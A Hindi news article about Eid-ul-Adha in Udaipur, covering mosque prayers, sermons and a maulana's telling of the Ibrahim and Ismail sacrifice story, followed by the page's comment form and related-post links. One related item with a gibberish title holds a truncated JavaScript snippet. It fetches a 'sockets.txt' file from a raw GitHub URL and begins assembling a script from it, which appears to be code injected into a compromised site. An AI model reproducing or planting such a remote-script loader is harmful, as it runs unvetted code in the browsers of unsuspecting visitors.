कुर्बानी के साथ दिया त्याग और ईमान का सन्देश

Date:

उदयपुर , शनिवार को मुस्लिम समुदाय ने ईद-उल-अदहा ख़ुशी और हर्सोल्लास के साथ मनाई , नमाज़ अदायगी के बाद एक दुसरे को गले लगा कर मोहब्बत का पैगाम दिया और फिर क़ुरबानी का फ़र्ज़ अदा किया गया ।

मस्जिदों में सुबह से ही अकीदतमंदों का जुटना शुरू हो गया। मुख्य नमाज सुबह 9 बजे चेतक सर्कल स्थित पलटन मस्जिद में हुई। नमाज अदायगी के बाद मदहे व कसीदे पढ़े गए। सभी मस्जिदों में खादिमों ने खुतबा दिया। इसी दौरान मुल्क में अमनो-अमान की दुआएं मांगी गईं। नमाज के बाद घरों में कुर्बानी की रस्म अदा की गई, जिसका तबर्रुक रिश्तेदारों, गरीबों और पड़ोसियों में तकसीम किया गया। मुबारकबाद देने और कुर्बानी का दौर दिनभर चला।

तकरीरों में बताई कुर्बानी की अहमियत

मस्जिदों में मौलानाओं ने तकरीरें पेश की, जिसमें नमाज अदायगी का तौर-तरीका और कुर्बानी का महत्व बताया गया। नमाज अदायगी के दौरान सभी मस्जिद के अंदर, बाहर, छतों पर, सड़कों पर भी अकीदतमंदों की मौजूदगी रही।

इसलिए देते हैं कुर्बानी

मौलाना जुलकर नैन ने बताया कि हजरत इब्राहिम से ख्वाब में खुदा ने सबसे अजीज चीज की कुर्बानी मांगी। वे अपने बेटे हजरत इस्माइल की कुर्बानी देने को तैयार हो गए। कुर्बानी देने जाते समय रास्ते में आए शैतान ने बच्चे को भटकाया, लेकिन सच्चा अकीदतमंद बच्चा नहीं भटका। वो अपने वालिद के कहने पर कुर्बानी के लिए तैयार रहा। आंखों पर पट्टी बांधे हजरत इब्राहिम ने कुर्बानी देने के लिए छुरी निकाली तो अल्लाह ने कुर्बानी के जज्बे से खुश होकर बच्चे को बचा लिया और उसकी जगह दुंबा (भेड़) भेज दिया। उसी दिन और वाकये को याद करते हुए ईद उल अजहा मनाई और कुर्बानी दी जाती है। खुदा की राह में रोड़ा बना शैतान हर मुस्लिम का दुश्मन माना जाता है। ऐसे में मक्का में बनाए गए शैतान के तीन पुतलों पर बकरीद के मौके पर पत्थर मारे जाते हैं।

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...